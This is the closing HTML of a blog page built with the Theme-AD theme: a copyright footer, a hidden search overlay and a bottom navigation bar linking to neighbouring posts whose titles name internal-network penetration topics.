      </div>
    
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <div class="site-layer-input-choose">
          <a href="javascript:void(0);" title="Change Search Engine">Google</a>
        </div>
        <input type="text">
        <i class="fa fa-search"></i>
      </div>
      
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
  </div>
</div>
    

<div class="bottom-bar">
  <div class="bottom-bar-left">
    <a href="/2022/09/06/内网/域渗透/" data-enable="true">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/2022/09/05/内网/权限维持/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
  
  
  
  
</div>
    





    
  </body>
</html>